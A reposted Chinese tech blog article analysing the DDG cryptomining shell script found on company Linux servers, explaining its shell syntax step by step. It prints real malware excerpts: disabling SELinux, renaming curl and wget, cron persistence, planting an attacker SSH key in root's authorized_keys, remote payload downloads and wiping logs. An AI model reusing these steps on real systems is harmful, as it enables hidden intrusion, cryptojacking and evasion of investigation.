酷应用

一个“挖矿脚本”还能难得住我?

百家 作者:51CTO技术栈 2020-06-01 23:33:04

公司有几台机器,最近 CPU 一直在疯转,就像是吃了药,一直在发热。由于机器实在是太多,有这么几台安全性防护没有到位,就一直躺在角落里疯狂运转。


图片来自 Pexels

直到统一的监控脚本接管了这几台机器,异常情况才得以浮出水面。最后发现了多个奇奇怪怪的进程,发现是一个挖矿脚本。


下载下来学习了一下,发现脚本的编写者,有着较高的水平。虽然在别人机器进行挖矿行为是不道德的,但掩盖不了脚本编写者的风骚操作。


挖矿,是计算机技术界最让人迷惑的行为之一,但它赚钱。据悉,这段脚本名叫 DDG,已经挖取了价值一千多万人民币的虚拟币货币。


本着学习的目的,我稍微分析了一下这个神奇的脚本,也算是吸尽它的精华,为我所用。


这事我都没敢告诉老板,因为说了他也不懂,反生事端。不过和大家交流一下还是可以的,因为你们懂啊。


01

Code 1


#!/bin/sh

脚本的第一行,看起来是一行注释,但其实并不是。它规定了接下来的脚本,将要采用哪一个 SHELL 执行。


像我们平常用的 bash、zsh 等,属于 sh 的超集,这个脚本使用 sh 作为执行的 shell,具有更好的可移植性。


02

Code 2


setenforce?0?2>dev/null
echo?SELINUX=disabled?>?/etc/sysconfig/selinux?2>/dev/null

setenforce 是 Linux 的 selinux 防火墙配置命令,执行 setenforce 0 表示关闭 selinux 防火墙。2 代表的是标准错误(stderr)的意思。


所以后面,使用重定向符,将命令的错误输出定向到 /dev/null 设备中。这个设备是一个虚拟设备,意思是什么都不干。非常适合静悄悄的干坏事。


03

Code 3


sync?&&?echo?3?>/proc/sys/vm/drop_caches

脚本贴心的帮我们释放了一些内存资源,以便获取更多的资源进行挖矿。


众所周知,Linux 系统会随着长时间的运行,会产生很多缓存,清理方式就是写一个数字到 drop_caches 文件里,这个数字通常为 3。


sync 命令将所有未写的系统缓冲区写到磁盘中,执行之后就可以放心的释放缓存了。


04

Code 4


crondir='/var/spool/cron/'"$USER"
cont=`cat?${crondir}`
ssht=`cat?/root/.ssh/authorized_keys`
echo?1?>?/etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv?/usr/bin/wget?/usr/bin/get
mv?/usr/bin/xget?/usr/bin/get
mv?/usr/bin/get?/usr/bin/wge
mv?/usr/bin/curl?/usr/bin/url
mv?/usr/bin/xurl?/usr/bin/url
mv?/usr/bin/url?/usr/bin/cur

没错,上面这些语句就是完成了一些普通的操作。值得注意的是,它把我们的一些常用命令,使用 mv 命令给重名了。


这在执行命令的时候,就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件,属于犯罪的范畴了。


脚本为了复用一些功能,抽象出了很多的函数。我们直接跳到 main 函数的执行,然后看一下这个过程。


05

Code 5


首先是 kill_miner_proc 函数。代码很长,就不全部贴出来了。
kill_miner_proc()
{
????ps?auxf|grep?-v?grep|grep?"mine.moneropool.com"|awk?'{print?$2}'|xargs?kill?-9
??...
????pkill?-f?biosetjenkins
????pkill?-f?Loopback
????...
????crontab?-r
????rm?-rf?/var/spool/cron/*

挖矿领域是一个相爱相杀的领域。这个方法首先使用 ps、grep、kill 一套组合,干掉了同行的挖矿脚本,然后停掉了同行的 cron 脚本,黑吃黑的感觉。


在这段脚本里,使用了 pkill 命令。这个命令会终止进程,并按终端号踢出用户,比较暴力。


06

Code 6


接下来执行的是 kill_sus_proc 函数。
ps?axf?-o?"pid"|while?read?procid
do
...
done

ps 加上 o 参数,可以指定要输出的列,在这里只输出的进程的 pid,然后使用 read 函数,对 procid 进行遍历操作。


07

Code 7


ls?-l?/proc/$procid/exe?|?grep?/tmp
if?[?$??-ne?1?]
then
...
fi

上面就是遍历操作过程了,我们可以看到 if 语句的语法。其中 $? 指的是上一个命令的退出状态。


0 表示没有错误,其他任何值表明有错误。-ne 是不等于的意思,意思就是能够匹配到 tmp 这个字符串。


08

Code 8


ps?axf?-o?"pid?%cpu"?|?awk?'{if($2>=40.0)?print?$1}'?|?while?read?procid
do
...
done

呵呵,上面又来了一次循环遍历。不过这次针对的目标,是 CPU 使用超过 40% 的进程。这就有点狠了:影响我挖矿的进程,都得死!相煎何太急。


09

Code 9


再接下来,脚本针对不同的用户属性,进行了不同的操作。


首先是 root 用户。通过判断是否存在 $rtdir 文件,来确定是否是 root 权限。
chattr?-i?/etc/sysupdate*
chattr?-i?/etc/config.json*
chattr?-i?/etc/update.sh*
chattr?-i?/root/.ssh/authorized_keys*
chattr?-i?/etc/networkservice

使用 chattr 命令,把一些重要的文件,搞成不能任意改动的只读属性,也是够损的。然后,操作 cron 程序,把脚本的更新服务加入到定时中。


就是下面这段脚本。


10

Code 10


if?[?!?-f?"/usr/bin/crontab"?]
then
????echo?"*/30?*?*?*?*?sh?/etc/update.sh?>/dev/null?2>&1"?>>?${crondir}
else
????[[?$cont?=~?"update.sh"?]]?||?(crontab?-l?;?echo?"*/30?*?*?*?*?sh?/etc/update.sh?>/dev/null?2>&1")?|?crontab?-
fi

注意 [[ $cont =~ "update.sh" ]] 这以小段代码,怪异的很。[[ ]] 是 shell 中内置的一个命令,支持字符串的模式匹配。


使用 =~ 的时候,甚至支持 shell 的正则表达式,强大的令人发指。它的输出结果是一个 bool 类型,所以能够使用||进行拼接。


而后面的单小括号 (),是的是一个命令组,括号中多个命令之间用分号隔开,最后一个命令可以没有分号;和 `cmd` 的效果基本是一样的。


11

Code 11


搞完了定时任务,就要配置 ssh 自动登录了,通过把公钥追加到信任列表中就可以。
chmod?700?/root/.ssh/
echo?>>?/root/.ssh/authorized_keys
chmod?600?root/.ssh/authorized_keys
echo?"ssh-rsa?AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/???????????????????????????????????????????????????????oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+?????????????????????????????????????????????????????????????????????????????????????????????????4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+??????????????????Kl2yXiHN5oD9BVTkdIWX?root@u17"?>>?/root/.ssh/authorized_keys????

12

Code 12


说曹操曹操就到,下面的脚本就使用了 `` 进行操作。
filesize_config=`ls?-l?/etc/config.json?|?awk?'{?print?$5?}'`
if?[?"$filesize_config"?-ne?"$config_size"?]
then
????pkill?-f?sysupdate
????rm?/etc/config.json
????downloads?$config_url?/etc/config.json?$config_url_backup
else
????echo?"no?need?download"
fi???

通过一系列骚操作,获取到配置文件的大小,如果判断文件大小不一致,那么就重新下载一个。这就用到了 downloads 函数。


shell 中的函数,看起来比较怪异,后面的参数传递,就像是脚本传递一样,传送给函数。


13

Code 13


downloads?$config_url?/etc/config.json?$config_url_backup

这句话,就传递了三个参数。当然,文件要从遥远的服务器上下载。域名是 .de 结尾的,证明是个德国的域名,其他的我们一无所知。
downloads()
{
????if?[?-f?"/usr/bin/curl"?]
????then
????echo?$1,$2
????????http_code=`curl?-I?-m?10?-o?/dev/null?-s?-w?%{http_code}?$1`
????????if?[?"$http_code"?-eq?"200"?]
????????then
????????????curl?--connect-timeout?10?--retry?100?$1?>?$2
????????elif?[?"$http_code"?-eq?"405"?]
????????then
????????????curl?--connect-timeout?10?--retry?100?$1?>?$2
????????else
????????????curl?--connect-timeout?10?--retry?100?$3?>?$2
????????fi
????elif?[?-f?"/usr/bin/cur"?]
????then
????????http_code?=?`cur?-I?-m?10?-o?/dev/null?-s?-w?%{http_code}?$1`
????????if?[?"$http_code"?-eq?"200"?]
????????then
????????????cur?--connect-timeout?10?--retry?100?$1?>?$2
????????elif?[?"$http_code"?-eq?"405"?]
????????then
????????????cur?--connect-timeout?10?--retry?100?$1?>?$2
????????else
????????????cur?--connect-timeout?10?--retry?100?$3?>?$2
fi
????elif?[?-f?"/usr/bin/wget"?]
????then
????????wget?--timeout=10?--tries=100?-O?$2?$1
????????if?[?$??-ne?0?]
????then
????????wget?--timeout=10?--tries=100?-O?$2?$3
????????fi
????elif?[?-f?"/usr/bin/wge"?]
????then
????????wge?--timeout=10?--tries=100?-O?$2?$1
????????if?[?$??-eq?0?]
????????then
????????????wge?--timeout=10?--tries=100?-O?$2?$3
????????fi
????fi
}

我认为,这段代码作者写的又臭又长,完全没有体现出自己应有的水平。应该是赶工期,没有想好代码的复用,才会写的这么有失水准。


我们上面说到,脚本改了几个命令的名字,其中就有 curl。这个命令是如此的强大,以至于脚本的作者都忍不住加了不少参数:

  • -I:用来测试 http 头信息。

  • -m:设置最大传输时间。

  • -o:指定保持的文件名。这里是 /dev/null,呃呃呃......

  • -s:静默模式,不输出任何东西。

  • --connect-timeout:连接超时时间。

  • --retry:重试次数,好狠,100 次。


如果没有 curl?那就使用替补的 wget,套路都是一样的。


14

Code 14


接下来是一系列相似的操作,最后,对 iptables 一批操作。
iptables?-F
iptables?-X
iptables?-A?OUTPUT?-p?tcp?--dport?3333?-j?DROP
iptables?-A?OUTPUT?-p?tcp?--dport?5555?-j?DROP
iptables?-A?OUTPUT?-p?tcp?--dport?7777?-j?DROP
iptables?-A?OUTPUT?-p?tcp?--dport?9999?-j?DROP
iptables?-I?INPUT?-s?43.245.222.57?-j?DROP
service?iptables?reload

15

Code 15


细心的脚本编写者,还使用命令清理了操作日志。
history?-c
echo?>?/var/spool/mail/root
echo?>?/var/log/wtmp
echo?>?/var/log/secure
echo?>?/root/.bash_history

不露死角,潇洒走开。可以看到,且不说真正的挖矿程序,仅仅是这个小脚本,作者也下足了功夫。


脚本里命令繁多,使用方式多样,缩紧格式优雅,除了有一点啰嗦,没有加密之外,是一个非常好的拿来学习的脚本。


瞧了瞧被控制的机器,我赶紧偷偷的重装了机器。就当它是一个梦吧。老板问起的时候,什么都没有发生过。


作者:小姐姐味道

简介:聚焦基础架构和 Linux。十年架构,日百亿流量,与你探讨高并发世界,给你不一样的味道。个人微信 xjjdog0,欢迎添加好友,进一步交流。

编辑:陶家龙

出处:转载自微信公众号小姐姐味道(ID:xjjdog)

精彩文章推荐:

一段被Try-Catch包裹的代码,差点让我丢了工作!
苏宁6亿会员是如何做到快速精确分析的?
工作5年,如何成为优秀的技术Leader?

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

*文章为作者独立观点,不代表 爱尖刀 立场
本文由 51CTO技术栈发表,转载此文章须经作者同意,并请附上出处( 爱尖刀 )及本页链接。
原文链接 https://www.ijiandao.com/2b/baijia/366194.html
图库
51CTO技术栈 51CTO技术栈
公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接
百度热搜榜
排名 热点 搜索指数
iTrust
AiDeep Ued
关于我们 联系我们 升级日志 法律声明 广告服务 侵删通道
Copyright © 2021 K2CMS All rights reserved.
京ICP备14006288号